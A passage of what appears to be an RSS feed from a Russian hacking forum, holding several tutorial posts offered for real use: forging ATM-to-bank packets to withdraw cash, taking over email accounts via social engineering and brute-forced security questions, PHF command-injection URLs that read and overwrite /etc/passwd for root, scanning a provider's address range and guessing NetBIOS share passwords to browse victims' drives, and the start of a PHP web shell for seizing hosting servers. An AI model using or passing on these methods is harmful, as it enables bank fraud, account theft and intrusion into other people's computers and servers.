липовый и установлен злоумышленниками специально для чтения карт и запоминания паролей. Позже его демонтировали, но злоумышленников, кажется, так и не нашли. За полтора года (а именно столько он умудрился простоять) кардеры перекачали на свой счет немалую сумму. Однако же рядовой хакер скорее найдет оброненную кем-то впопыхах тысячедолларовую купюру, чем завалявшийся на свалке банкомат. Может быть, есть способ попроще?&lt;/p&gt;
						&lt;p&gt;Есть, но для этого потребуется умение держать паяльник в руках, чтобы смастерить себе некий хардваринговый девайс, а также разбираться в сетевых протоколах на канальном уровне. Идея проста до безобразия: поскольку банкомат в себе не хранит никакой информации и всегда обращается за ответом в банк, то можно, врезавшись в кабель между ним и банком, перехватить трафик и фальсифицировать его нужным нам образом. Ни один банк не в состоянии гарантировать целостность кабеля на всем его протяжении.&lt;/p&gt;
						&lt;p&gt;Разумеется, для анализа протокола обмена понадобится персональный компьютер, а также программа для снятия дампа и представления его в удобочитаемом виде. Можно, к примеру, воспользоваться компактной и маленькой утилитой pio и навигатором управления bleak_l, заботливо написанным хакером KPNC для взлома НТВ, но вполне подходящим и для этого случая.&lt;/p&gt;
						&lt;p&gt;Единственное, что придется спаять самостоятельно, так это контроллер для подсоединения к банковскому кабелю. В Сети очень много различных схем и энтузиастов, предлагающих за относительно небольшие деньги приобрести уже готовые изделия. Так или иначе, но в дальнейшем будем считать, что такой девайс у нас есть.&lt;/p&gt;
						&lt;p&gt;Наши последующие действия&lt;/p&gt;
						&lt;p&gt;- Врезаемся в линию между банкоматом и авторизационным центом (заметим, что врезаться придется в разрыв кабеля, так чтобы вы в дальнейшем могли не только перехватывать, но и блокировать любые проходящие пакеты). Разумеется, что если мы хотя бы на мгновение прервем целостность кабеля, дело закончится плачевно. Поэтому поищите в книжках электронные схемы мгновенной коммутации &amp;quot;на ходу&amp;quot;. Аналогичным образом мошенники нейтрализуют сложные системы электронных сигнализаций. Не тех, что в магазинах, а на порядок совершеннее.&lt;/p&gt;
						&lt;p&gt;- Наблюдаем за пересылкой пакетов, не предпринимая никаких действий. Только наблюдаем, чтобы понять логику. На самом деле это &amp;quot;только&amp;quot; представляет собой утомительный и кропотливый анализ протоколов и расшифровки всех полей заголовков пакетов с той целью, чтобы в дальнейшем иметь возможность генерации и отправки собственных пакетов, не опасаясь того, что они чем-то будут отличаться от реальных.&lt;/p&gt;
						&lt;p&gt;- Теперь манипулируем легальной картой (это значит, что по крайней меру одну карту вы должны будете все же завести) с тем, чтобы понять логику обмена. В частности, найти и опознать передаваемые банкоматом запросы и возвращаемые ему ответы.&lt;/p&gt;
						&lt;p&gt;- Сравним теперь это с просроченной картой, чтобы определить реакцию системы в такой ситуации, а также найти и идентифицировать коды ошибок (они нам потом понадобятся).&lt;/p&gt;
						&lt;p&gt;- Наконец, тяпнем по маленькой для храбрости и, оставив Шварценеггера на шухере, начнем процесс. Засовываем нашу карту, на счету которой лежат оставшиеся после экспериментов с банкоматом несколько долларов.&lt;/p&gt;
						&lt;p&gt;- Наблюдаем, как банкомат шлет запрос, включая номер нашего счета и все остальное. Мы никак не вмешиваемся в этот процесс.&lt;/p&gt;
						&lt;p&gt;- Авторизационный центр должен вернуть ответ, в котором содержится много полезной информации. А среди нее - максимально возможная сумма для снятия. Вот тут мы перехватываем этот пакет и взамен него шлем другой. Чем он отличается от оригинального, не стоит, наверное, даже говорить - и так всем ясно. Но будьте внимательны! Эта сумма может присутствовать сразу в нескольких полях, кроме того, необходимо скорректировать и поле контрольной суммы, иначе ничего не получится! Это самый сложный момент во взломе.&lt;/p&gt;
						&lt;p&gt;- Впрочем, на этом этапе вы еще ничем не рискуете. Если ошибетесь, то просто перехватите обратный ответ банкомата и не пропустите его. Ведь вы еще помните коды ошибок, не так ли? А поэтому пробуйте, пока банкомат не &amp;quot;проглотит&amp;quot; фальсифицированный пакет.&lt;/p&gt;
						&lt;p&gt;- Ну что же, теперь требуйте от банкомата столько денег, на сколько у вас хватит совести. В это время банкомат передает банку, сколько денег было снято. Взаправду. Эту информацию надо перехватить и послать ложный пакет, что денег снято всего 1 доллар (или сколько у вас там осталось взаправду на карточке). Будьте очень внимательны. Теперь фальсифицированный пакет передается уже банку, и любое неверное действие будет необратимо зафиксировано системой безопасности, и даже Шварценеггеру скоро покажется жарковато.&lt;/p&gt;
						&lt;p&gt;- Ну вот и все. Осталась маленькая проблема - как обеспечить сходимость дебета и кредита. Ведь банкомат ведет логи и протоколы всех действий. Подумайте, как можно обмануть систему.&lt;/p&gt;
						&lt;p&gt;- Наконец все! Вы отсоединяете свой ноутбук от кабеля, по возможности замаскировав нелегальное подключение, и отправляетесь в ближайший компьютерный салон за новым микропроцессором.&lt;/p&gt;
						&lt;p&gt;- Однако помните, что многие банкоматы сейчас снабжены контрольными телекамерами, что не есть хорошо. Но к счастью, еще не все. И стальная крыса всегда найдет для себя щель!&lt;/p&gt;
						&lt;p&gt;А вообще, чтобы ломать банкоматы, неплохо бы разобраться в их устройстве, типовом протоколе обмена и программном обеспечении. То есть так или иначе выбрать себе работу, связанную с их разработкой, созданием или по крайней мере эксплуатацией. В этом случае вы получите действительно достоверную информацию об их устройстве, а также слабых и сильных сторонах. А ведь уязвимость у них действительно есть. Только она неочевидна для постороннего, не работавшего с ними человека. Но как и любому человеческому творению, этому свойственны недостатки не в меньшем числе. Однако будете ли вы заниматься мелким жульничеством, находясь на высокооплачиваемой работе?&lt;/p&gt;</description>
			<author>mybb@mybb.ru (admin)</author>
			<pubDate>Wed, 05 Aug 2009 14:11:37 +0400</pubDate>
			<guid>http://hackzona.youbb.ru/viewtopic.php?pid=35#p35</guid>
		</item>
		<item>
			<title>Взлом мыла</title>
			<link>http://hackzona.youbb.ru/viewtopic.php?pid=34#p34</link>
			<description>&lt;p&gt;Один из самых простых &lt;br /&gt;Пишите владельцу мыла какое нить письмо, все равно с каким содержанием, но лишь бы хозяин мыла ответил. Если это какой нить &amp;quot;чудо-крутой хакер&amp;quot;, то что нить типа: &amp;quot;Слушай, а ты в натуре можешь сайт сломать??? &lt;a href=&quot;http://www.microsoft.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.microsoft.com/&lt;/a&gt; не твоя работа???&amp;quot; и так далее в этом духе...;-) Если Веб-мастер, то что нить типа: &amp;quot;Мне так нравится как ты пишешь! А у тебя JAVA-скрипта нету, что б он там что то делал???&amp;quot;...По фигу ЧТО, главное что б от него назад ответ пришел. В принципе эта вся процедура была только для того, что б узнать ИМЯ_ФАМИЛИЮ (или ник) и место расположения &amp;quot;клиента&amp;quot;. То бишь если по ентому мылу находится аська, то смотрим инфу в аське, город (если не прописан в аське, то по ИП), имя, возраст и зип. Потом пишешь админу мыльного сервака (у любой мыльной системы есть админ, и у 99% www-шные сервера), обычно это адреса admin@provider.com и support@provider.com. Так вот... Пишешь письмо (очень желательно через www-браузер, например от wwwmail.ru или wwwhotmail.com) и через анонимную проксю. Это для того что б в заголовке пакета был ИП прокси. Так.... для секьюрити... ;-) Так вот. В теле письма пишешь, что так и так... Злобные хакеры украли у тебя мыло, а тебе очень нравится их служба, сервис, скорость работы, безглючность и все такое... Что ты никогда не променяешь ихний сервис, и что они вообще самые крутые мыльщики! Указываешь ИМЯ, ФАМИЛИЮ, ЗИП, ГОРОД, Телефон (от балды) или что они там еще просят.... Ессено назад придет письмо, что &amp;quot;Информация не совпадает с введенной при регистрации и все такое...&amp;quot;. Но ты будь настойчивей! Пиши назад, что ТО_ЧТО_ТЫ_ИМ_ВЫДАЕШЬ - ЕДИНСТВЕННАЯ ВЕРНАЯ ИНФОРМАЦИЯ о ТВОЕМ аккаунте! И повторяешь им ту же инфу, что и первый раз. И так пока админ не сломится...но не забывай каждый раз расхваливать их сервис! ;-) Обычно раз на 7-10 прокатывает... ;-) У меня был даже раз случай, когда один буржуйский админ &amp;quot;отдал&amp;quot; мне мыло, где (как потом оказалось) инфа прописанная в мыле ВООБЩЕ не соответствовала той что я ему ВЫДАВАЛ якобы за владельца аккаунта! Так что дерзайте, тут главное БОЛЬШЕ фантазии и упорства! Но и о безопасности не забывайте! &lt;br /&gt;Второй способ &lt;br /&gt;Посложнее, но все равно общедоступный. Почти в каждом мыльном сервисе есть служба что типа &amp;quot;Foggot Password?&amp;quot; Так вот...Заходим туды (предварительно не забыв изменить атрибуты филе cookie_для_этой_службы на ReadOnly). Там обычно ОЧЕНЬ простые вопросы... Если повезет , то вопрос будет (к примеру на мыло.ру) &amp;quot;В каком городе ты родился&amp;quot;? В первом способе описано как узнавать город юзверя по мылу , так что на этом не бум останавливаться .Ну и вопросы бывают &amp;quot;кустомайзские&amp;quot;- типа &amp;quot;2000&amp;quot; , ответ обычно такойже..;-) А вот если что нить типа &amp;quot;Как зовут мою собаку?&amp;quot; , то читай ниже... Открываем эту страницу (ну где вводить надо ответ на секретный вопрос , не догоняешь что ль???;-)) итам в HTML-просмотре ищем строчкутипа : form action=&amp;quot;/cgi-bin/3970.dll?secquest&amp;quot; итд... Так вот... Если урл мыла &lt;a href=&quot;http://www.mail.ru&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.mail.ru&lt;/a&gt; , то полный урл места куда отправляется&amp;quot;секретный ответ&amp;quot; будет &lt;a href=&quot;http://www.mail.ru/cgi-bin/3970.dll?secquest.&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.mail.ru/cgi-bin/3970.dll?secquest.&lt;/a&gt; Этот урл вводишь вместе с индефикатором Вопроса в программу типа WWWHack. Идентификатор вопроса находится там же где и form action=&amp;quot;/cgi-bin/3970.dll?secquest, только чуть дальше . Потом в эту программу или загружаешь встроенный wordlist c паролями или пишешь свой по конкретной тематике, это зависит от вопроса . И вперед! Запускаешь и ждешь... Так что тут тоже нужно терпение и хоть базовые знания HTML.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (admin)</author>
			<pubDate>Wed, 05 Aug 2009 14:08:46 +0400</pubDate>
			<guid>http://hackzona.youbb.ru/viewtopic.php?pid=34#p34</guid>
		</item>
		<item>
			<title>Взлом сайтов через браузер</title>
			<link>http://hackzona.youbb.ru/viewtopic.php?pid=33#p33</link>
			<description>&lt;p&gt;Взлом, используя браузер, заключается в получении файла passwd из каталога /etc. Либо в удалении всего (или части), что имеется на сайте. :) Когда вы получите passwd и расшифруете его, то дальше уже надо будет работать с telnet&#039;ом и использовать exploits. Но это не в этой статье :)&lt;/p&gt;
						&lt;p&gt;Итак, приступим.&lt;/p&gt;
						&lt;p&gt;Самый простой способ получить passwd с помощью браузера - это техника PHF. Т.е. вы в строке адреса набираете: wwwhackzone.ru/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd Если скрипт phf лежит в каталоге cgi-bin, то он вам выдаст на экран passwd. %0a - перевод строки. Ну что-то типа нажатия на enter. /bin/cat%20/etc/passwd - эквиваленто /bin/cat etc/passwd. Запускается программа cat - просмотр содержимого файла. В данном случае файл passwd в каталоге /etc. Вместо cat, можно поставить другие команды: ls (список файлов в каталоге), id (ваши права), rm (удалить файл) и т.п. Сначала лучше запустить id, чтобы поглядеть какие у вас права - если root, то вам повезло!&lt;/p&gt;
						&lt;p&gt;Следующий способ - разновидность первого. Если вы обнаружили, что у вас права root, то можно просто взять passwd и добавить последней строчкой ваш логин, с правами Root. И потом залить его через FTP в любой каталог (пусть это будет income). Далее в браузере с помощью ls ищем полный путь к этому каталогу (допустим он /home/local/ftp/income). Тогда пишем wwwhackzone.ru/cgi-bin/phf?Qalias=x%0a/bin/cp%20/home/local/ftp/income/passwd%20/etc/passwd Т.е. мы скопировали наш passwd, на уже существующий! Теперь у нас есть права Root!!!&lt;/p&gt;
						&lt;p&gt;Следующий способ более сложный. Он заключается в том, чтобы выявить у CGI скриптов уязвимые места, и использовать их для получения passwd. Т.е. надо сделать так, чтобы скрипт начал выполнять вашу команду (cat, ls, rm...). Например на сервере есть скрипт, который отсылает сообщение кому-либо с помощью команды mail (эта команда позоляет выполнять другие команды!). Тогда в теле письма достаточно вставить ;cat /etc/passwd и вы увидите passwd, если скрипт не проверяет наличе таких символов как ;&amp;gt;|&amp;lt; и т.п., то все будет OK! Тоже самое позволяет делать команда finger.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (admin)</author>
			<pubDate>Wed, 05 Aug 2009 14:01:51 +0400</pubDate>
			<guid>http://hackzona.youbb.ru/viewtopic.php?pid=33#p33</guid>
		</item>
		<item>
			<title>Взлом удаленного компьютера через интернет</title>
			<link>http://hackzona.youbb.ru/viewtopic.php?pid=32#p32</link>
			<description>&lt;p&gt;Взлом удаленного компьютера через интернет Конечно да!!! По многочисленным просьбам в письмах я решился написать эту статью лично, ввиду отсутствия квалифицированных ответов в Интернет (личные наблюдения). Постараюсь объяснить как это сделать так сказать &amp;quot;на пальцах&amp;quot;, насколько у меня это получится - не знаю поскольку все это постигал сам... Прежде всего мой совет: &lt;br /&gt;Установите на свой компьютер Windows 2k &lt;br /&gt;Скачайте и установите на свой компьютер сканер Essential Net Tools v3.0&lt;br /&gt;Скачайте и установите на свой компьютер HakTek v1.1 &lt;br /&gt;IMPORTANT!!! Не забывайте включить протокол Net BEUI и Доступ к файлам и принтерам сети Microsoft!! В Windows 2000 это делается только в свойствах соединения, а в 9х его еще нужно поставить в свойствах сети! Ну, пожалуй для начала взлома удаленного компьютера этого вполне достаточно. Хотя нет, скачайте с сайта &lt;a href=&quot;http://www.pysoft.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.pysoft.com/&lt;/a&gt; звонилку Advanced Dialer, ну этого должно хватить... Теперь некоторые объяснения предыдущих действий: &lt;br /&gt;Для чего нам Windows 2k? Да очень просто - по моим наблюдениям все сканеры лучше и корректнее работают под 2000, кроме этого когда вы нашли потенциальную жертву вам нужно изменить вашу рабочую группу на группу установленную на компьютере жертвы в Windows 2000 это делается так: правая кнопка мыши на &amp;gt;Мой компьютер&amp;gt; выбираем &amp;gt;Сетевая идентификация &amp;gt;Свойства, в нижней части там где написано &amp;quot;Является членом:&amp;quot; должна стоять галочка &amp;quot;Рабочей группы&amp;quot; вы пишите нужное вам имя рабочей группы, нажимаете &amp;quot;ОК&amp;quot; и вам высвечивается приветствие &amp;quot;Добро пожаловать в рабочую группу такую-то&amp;quot;, вы нажимаете кнопочку &amp;quot;ОК&amp;quot; и вам предлагается перезагрузить компьютер для вступления в силу изменений, в этот момент вы должны не нажать кнопочку &amp;quot;ОК&amp;quot;, как ранее, а просто закрыть окошко, теперь вам просто нужно нажать &amp;quot;ОК&amp;quot; на &amp;quot;Свойствах системы&amp;quot; и опять вас предупредят о том что нужно перезагрузить компьютер, на что вы должны категорично ответить &amp;quot;НЕТ&amp;quot;. Поздравляю - изменения вступили - таки в силу без всяких там перезагрузок. В этом еще одна изюминка Windows 2000, поскольку в системах &amp;quot;для домохозяек&amp;quot;, а именно 9х, Ме изменения вступают только после перезагрузки! А это все время: время на перезагрузку, на подключение к интернет - в результате вполне возможно, что когда вы подключитесь к интернет после перезагрузки жертвы уже там не будет. Экономьте время!!! Зачем жен нам Essential NetTools v3.0? Как было сказано выше - это сканер (более подробное описание вы сможете найти на страничке скачивания), нам же достаточно знать что он позволяет сканировать диапазон IP-адресов на расшаренные ресурсы, и выборочный адрес на шары (расшаренные, шары - ресурсы доступные пользователям рабочей группы, а следовательно и вам!), а также, что тоже немаловажно!, подбирать пароли доступа (не думайте что это такая уж быстрая процедура, но, как правило, в большинстве случаев лица с расшаренными ресурсами - это либо ломаки, либо лица чересчур самоуверенные, либо секретарши на фирмах (кстати почему бы им всем не подумать о безопасности?) у которых пароль подбирается буквально с первой - второй попытки:-))) Кроме того, она позволяет подключать эти самые шары к вашему компьютеру без головной боли (но эта процедура итак не очень утомительная). Ну вроде по этому поводу - все.... HakTek v1.1 - в принципе особой необходимости в этой программе нет, но все-равно рекомендую скачать - мне больше всего нравится Finger Session. Вобщем - читайте описание на страничке скачивания. Зачем нам Advanced Dialer? Вроде бы простая звонилка... Но у нее есть одна хорошая черта. Вы хотите иметь пароли пользователей вашего провайдера? Тогда ставьте Advanced Dialer ибо он при подключении показывает и ваш IP-адрес и, что самое главное, IP-адрес сервера провайдера к которому вы подключены (так же как и многие другие пользователи!!!;-))) - вот это главное! &lt;/p&gt;
						&lt;p&gt;Ну, предположим, что вы выполнили все рекомендации. Теперь начнем работу на примере кражи документов с диска С компьютера подключенного к тому же провайдеру что и вы: Подключаемся к интернет при помощи Advanced Dialer и смотрим IP-адрес сервера провайдера (как правило он никогда не изменяется, так что смело можете записывать его на бумажку), допустим 194.153.128.132 - реальный IP-адрес провайдера ZEOS Запускаем Essential NetTools v3.0 и выбираем NBScan, там вводим начальный IP-адрес для сканирования &amp;quot;Starting IP adress&amp;quot; (в нашем случае пусть это будет например 194.153.128.0) и конечный IP-адрес &amp;quot;Ending IP adress&amp;quot; (в нашем случае это пусть будет 194.153.128.255) После того как процесс сканирования окончен мы увидим примерно следующее: NAME WORKGROUP RS IP Adress MAC Adress &lt;br /&gt;Legioner Legion666 Yes 194.153.128.15 это нас не интересует &lt;br /&gt;Vovan Workgroup No 194.153.128.19 это нас не интересует &lt;br /&gt;Dmitriy Venera Yes 194.153.128.21 это нас не интересует &lt;br /&gt;Sinelnikov Claus Yes 194.153.128.32 это нас не интересует &lt;br /&gt;Kinder Troja Yes 194.153.128.43 это нас не интересует &lt;br /&gt;Sky Circus Yes 194.153.128.47 это нас не интересует &lt;br /&gt;Trishka Killers No 194.153.128.64 это нас не интересует &lt;br /&gt;Judge Dred No 194.153.128.69 это нас не интересует &lt;/p&gt;
						&lt;p&gt;4. Мы видим имена, рабочие группы, RS - расшаренные ресурсы, IP-адреса, адреса МАК компьютеров с NetBios Sessions (то есть с открытым 139 - м портом) Кстати не забудьте включить у себя NetBios - иначе ничего не будет, также для личной безопасности сделайте все диски и принтеры локальными (защитите их от чтения и записи). Нам нужны только: рабочая группа, RS, IP-адреса. Если RS - No - об этом компьютере можно сразу забыть. Если же -Yes, то можно попробовать подключится к нему. Для этого: &lt;br /&gt;Включаем NAT &lt;br /&gt;Вводим адрес IP - например 194.153.128.15 и нажимаем &amp;quot;SCAN&amp;quot; &lt;br /&gt;Теперь немного подождем... &lt;br /&gt;Что мы видим: &lt;br /&gt;* Checking 194.153.128.47 ...&lt;br /&gt;* Obtained NetBIOS name table:&lt;br /&gt;SKY &amp;lt;00&amp;gt;&lt;br /&gt;SKY &amp;lt;20&amp;gt;&lt;br /&gt;CIRCUS &amp;lt;00&amp;gt;&lt;br /&gt;SKY &amp;lt;03&amp;gt;&lt;br /&gt;CIRCUS &amp;lt;1E&amp;gt;&lt;br /&gt;DAN &amp;lt;03&amp;gt;&lt;br /&gt;CIRCUS &amp;lt;1D&amp;gt;&lt;br /&gt;..__MSBROWSE__. &amp;lt;01&amp;gt;&lt;br /&gt;* Trying username &amp;quot;ADMINISTRATOR&amp;quot;, password &amp;quot;&amp;quot;: failed - начало подбора пароля&lt;br /&gt;* Trying username &amp;quot;ADMINISTRATOR&amp;quot;, password &amp;quot;ADMINISTRATOR&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;ADMINISTRATOR&amp;quot;, password &amp;quot;GUEST&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;ADMINISTRATOR&amp;quot;, password &amp;quot;ROOT&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;ADMINISTRATOR&amp;quot;, password &amp;quot;ADMIN&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;ADMINISTRATOR&amp;quot;, password &amp;quot;PASSWORD&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;ADMINISTRATOR&amp;quot;, password &amp;quot;TEMP&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;ADMINISTRATOR&amp;quot;, password &amp;quot;SHARE&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;ADMINISTRATOR&amp;quot;, password &amp;quot;WRITE&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;ADMINISTRATOR&amp;quot;, password &amp;quot;FULL&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;ADMINISTRATOR&amp;quot;, password &amp;quot;BOTH&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;ADMINISTRATOR&amp;quot;, password &amp;quot;READ&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;ADMINISTRATOR&amp;quot;, password &amp;quot;FILES&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;ADMINISTRATOR&amp;quot;, password &amp;quot;DEMO&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;ADMINISTRATOR&amp;quot;, password &amp;quot;TEST&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;ADMINISTRATOR&amp;quot;, password &amp;quot;ACCESS&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;ADMINISTRATOR&amp;quot;, password &amp;quot;USER&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;ADMINISTRATOR&amp;quot;, password &amp;quot;BACKUP&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;ADMINISTRATOR&amp;quot;, password &amp;quot;SYSTEM&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;ADMINISTRATOR&amp;quot;, password &amp;quot;SERVER&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;ADMINISTRATOR&amp;quot;, password &amp;quot;LOCAL&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;GUEST&amp;quot;, password &amp;quot;&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;GUEST&amp;quot;, password &amp;quot;ADMINISTRATOR&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;GUEST&amp;quot;, password &amp;quot;GUEST&amp;quot;: succeeded - пароль успешно подобран&lt;br /&gt;* Obtained share list: - список возможных доступных ресурсов&lt;br /&gt;IPC$ Remote IPC&lt;br /&gt;E$ Default share&lt;br /&gt;D$ Default share&lt;br /&gt;C&lt;br /&gt;ADMIN$ Remote Admin&lt;br /&gt;C$ Default share&lt;br /&gt;* Obtained server information:&lt;br /&gt;Server=[SKY] User=[] Workgroup=[SKYGROUP] Domain=[]&lt;br /&gt;* Checking share E$: access denied - доступ запрещен&lt;br /&gt;* Checking share D$: access denied - доступ запрещен&lt;br /&gt;* Checking share C: read-write access - доступ разрешен для чтения-записи&lt;br /&gt;* Checking share ADMIN$: access denied&lt;br /&gt;* Checking share C$: access denied&lt;br /&gt;* Finished checking 194.153.128.47 &lt;/p&gt;
						&lt;p&gt;Ну вот мы и нашли подходящую жертву! Как видно из списка, мы можем подключиться к диску С (разрешен доступ для чтения и записи), то есть мы можем записывать жертве на диск, стирать с его диска, копировать с его диска!&lt;br /&gt;Теперь нам нужно подключить удаленный компьютер. В этом нет ничего сложного. Для этого нам нужно изменить рабочую группу согласно вышеописанному способу. В Essential NetTools открыть NBScan и выделить потенциальную &amp;quot;жертву&amp;quot;, в нашем случае это Sky с рабочей группой Circus и IP-адресом 194.153.128.47, нажать правую кнопку мышки и выбрать в контекстном меню &amp;quot;Open computer&amp;quot;. В ответ откроется стандартное окно Windows где будет присутствовать диск &amp;quot;С&amp;quot;. Наводим на этот самый диск &amp;quot;С&amp;quot; нажимаем правую кнопку мыши и в контекстном меню выбираем &amp;quot;Подключить сетевой диск&amp;quot;, когда главный каталог будет считан мы можем начинать &amp;quot;лазить&amp;quot;, а точнее сказать &amp;quot;ползать&amp;quot; по диску &amp;quot;С&amp;quot; удаленного компьютера с адресом 194.153.128.47, делать это можно при помощи стандартного &amp;quot;Проводника&amp;quot;, Windows Commander и других программ. Дерзайте!&lt;/p&gt;</description>
			<author>mybb@mybb.ru (admin)</author>
			<pubDate>Wed, 05 Aug 2009 13:59:37 +0400</pubDate>
			<guid>http://hackzona.youbb.ru/viewtopic.php?pid=32#p32</guid>
		</item>
		<item>
			<title>Взлом через PHP-скрипт</title>
			<link>http://hackzona.youbb.ru/viewtopic.php?pid=31#p31</link>
			<description>&lt;p&gt;Данная атака на сервер проходит со 100% гарантией. Для успешной атаки взломщику необходимо дисковое пространство на сервере размером в 10 Kb (столько весит скрипт) и возможность запустить свой PHP скрипт. Далеко не секрет, что хакеры очень часто проникают в систему используя социнженерию, тоесть изначально подготавливают жертву, чтобы та им доверяла, получают от неё информацию и осуществляют взлом. Поэтому раздобыть на любом сервере небольшое дисковое пространство для хакера не проблема. В крайнем случае можно и купить себе домен на сервере провайдера или любой другой хостинговой компании, которую хакер собирается взломать. В большей части взлому подвержены бесплатные хостинговые компании и провайдеры, которые при регистрации доступа в интернет дают бесплатное место для размещение домашней странички пользователя с запуском собственных PHP скриптов. Идея реализации атаки заключается в том, чтобы залезть на жесткий диск провайдера и иметь возможность управлять файлами, тоесть удалять, просматривать, редактировать. Для этого нам придётся написать небольшой скрипт, который получит доступ к ресурсам сервера. Для начала определим какими функциями должен обладать скрипт: заложим в него функции удаления выбранных файлов, скрипт должен уметь просматривать картинки, открывать каталоги, выставлять права доступа к файлам, знать когда файл был создан в системе, когда файл был изменён, к какой группе относится файл и выставлять соответствующую иконку для удобства, переходить из каталога в каталог, указывать полные пути до файлов: &lt;br /&gt;&amp;lt;?php //говорим что это PHP скрипт &lt;br /&gt;function cmp( $a, $b ) //обьявляем функции&lt;br /&gt;{ &lt;br /&gt;GLOBAL $sort; //сортируем полученные функции &lt;/p&gt;
						&lt;p&gt;if( $a-&amp;gt;inode == $b-&amp;gt;inode ) &lt;br /&gt;return 0; &lt;/p&gt;
						&lt;p&gt;switch( $sort ) //объявляем , что по каким функциям будет сортироваться &lt;br /&gt;{ &lt;br /&gt;case &amp;quot;size&amp;quot;: &lt;br /&gt;return ($a-&amp;gt;size &amp;gt; $b-&amp;gt;size) ? -1 : 1; &lt;br /&gt;case &amp;quot;type&amp;quot;: &lt;br /&gt;return strcmp($a-&amp;gt;type, $b-&amp;gt;type); &lt;br /&gt;case &amp;quot;view&amp;quot;: &lt;br /&gt;return strcmp($a-&amp;gt;view, $b-&amp;gt;view); &lt;br /&gt;case &amp;quot;atime&amp;quot;: &lt;br /&gt;return ($a-&amp;gt;atime &amp;gt; $b-&amp;gt;atime) ? -1 : 1; &lt;br /&gt;case &amp;quot;ctime&amp;quot;: &lt;br /&gt;return ($a-&amp;gt;ctime &amp;gt; $b-&amp;gt;ctime) ? -1 : 1; &lt;br /&gt;case &amp;quot;mtime&amp;quot;: &lt;br /&gt;return ($a-&amp;gt;mtime &amp;gt; $b-&amp;gt;mtime) ? -1 : 1; &lt;br /&gt;case &amp;quot;group&amp;quot;: &lt;br /&gt;return strcmp($a-&amp;gt;group, $b-&amp;gt;group); &lt;br /&gt;case &amp;quot;inode&amp;quot;: &lt;br /&gt;return ($a-&amp;gt;inode &amp;gt; $b-&amp;gt;inode) ? -1 : 1; &lt;br /&gt;case &amp;quot;owner&amp;quot;: &lt;br /&gt;return strcmp($a-&amp;gt;owner, $b-&amp;gt;owner); &lt;br /&gt;case &amp;quot;perms&amp;quot;: &lt;br /&gt;return ($a-&amp;gt;perms &amp;gt; $b-&amp;gt;perms) ? -1 : 1; &lt;br /&gt;case &amp;quot;ext&amp;quot;: &lt;br /&gt;return strcmp($a-&amp;gt;ext, $b-&amp;gt;ext); &lt;br /&gt;case &amp;quot;name&amp;quot;: &lt;br /&gt;default: &lt;br /&gt;return 1; &lt;br /&gt;} &lt;br /&gt;} &lt;/p&gt;
						&lt;p&gt;function getIcons( $ext ) //объявляем функцию сопоставления иконки с типом файла &lt;br /&gt;{ &lt;br /&gt;switch( $ext ) &lt;br /&gt;{ &lt;br /&gt;case &amp;quot;dir&amp;quot;: &lt;br /&gt;$file = &amp;quot;dir&amp;quot;; &lt;br /&gt;break; &lt;br /&gt;case &amp;quot;link&amp;quot;: &lt;br /&gt;$file = &amp;quot;link&amp;quot;; &lt;br /&gt;break; &lt;br /&gt;case &amp;quot;zip&amp;quot;: &lt;br /&gt;case &amp;quot;tgz&amp;quot;: &lt;br /&gt;case &amp;quot;gz&amp;quot;: &lt;br /&gt;case &amp;quot;Z&amp;quot;: &lt;br /&gt;$file = &amp;quot;compressed&amp;quot;; &lt;br /&gt;break; &lt;br /&gt;case &amp;quot;gif&amp;quot;:&lt;br /&gt;case &amp;quot;jpg&amp;quot;: &lt;br /&gt;$file = &amp;quot;image2&amp;quot;; &lt;br /&gt;break; &lt;br /&gt;case &amp;quot;dvi&amp;quot;: &lt;br /&gt;$file = &amp;quot;dvi&amp;quot;; &lt;br /&gt;break; &lt;br /&gt;case &amp;quot;&amp;quot;: &lt;br /&gt;case &amp;quot;exe&amp;quot;: &lt;br /&gt;$file = &amp;quot;binary&amp;quot;; &lt;br /&gt;break; &lt;br /&gt;case &amp;quot;sh&amp;quot;: &lt;br /&gt;case &amp;quot;php&amp;quot;: &lt;br /&gt;case &amp;quot;php3&amp;quot;: &lt;br /&gt;case &amp;quot;sql&amp;quot;: &lt;br /&gt;case &amp;quot;inc&amp;quot;: &lt;br /&gt;case &amp;quot;js&amp;quot;: &lt;br /&gt;$file = &amp;quot;script&amp;quot;; &lt;br /&gt;break; &lt;br /&gt;case &amp;quot;txt&amp;quot;:&lt;br /&gt;$file = &amp;quot;text&amp;quot;;&lt;br /&gt;break; &lt;br /&gt;case &amp;quot;html&amp;quot;: &lt;br /&gt;case &amp;quot;shtml&amp;quot;: &lt;br /&gt;case &amp;quot;phtml&amp;quot;: &lt;br /&gt;$file = &amp;quot;world1&amp;quot;; &lt;br /&gt;break; &lt;br /&gt;default: &lt;br /&gt;$file = &amp;quot;generic&amp;quot;; &lt;br /&gt;break; &lt;br /&gt;} &lt;/p&gt;
